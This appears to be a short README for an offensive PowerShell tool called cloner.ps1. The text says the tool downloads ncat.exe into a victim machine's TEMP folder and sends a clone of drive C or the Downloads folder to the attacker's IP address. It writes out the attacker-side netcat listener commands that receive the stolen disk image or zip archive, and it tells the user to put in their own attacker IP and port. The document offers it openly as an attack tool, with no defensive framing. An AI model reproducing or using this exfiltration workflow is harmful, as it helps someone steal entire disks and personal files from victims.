This script is coded in powershell, How it works, it will go no and download ncat.exe file in the /TEMP location of your victim machine and after it will go on and clone the local disk C or Downloads depending to the script you use and it sends it to the attacks's ip address.

change the port and ip address in the script to attack's ip and port

Usage:

Linux machine Receiver with C:cloner.ps1

nc -l -p 12345 | pv | dd of=/path/to/target/image.img bs=4M

Linux machine Receiver with Downloads:cloner.ps1

nc -l -p 12345 > Downloads.zip && unzip Downloads.zip -d /path/to/extract/

This command receivers the zipped data sent by ncat and unzip it to the provided location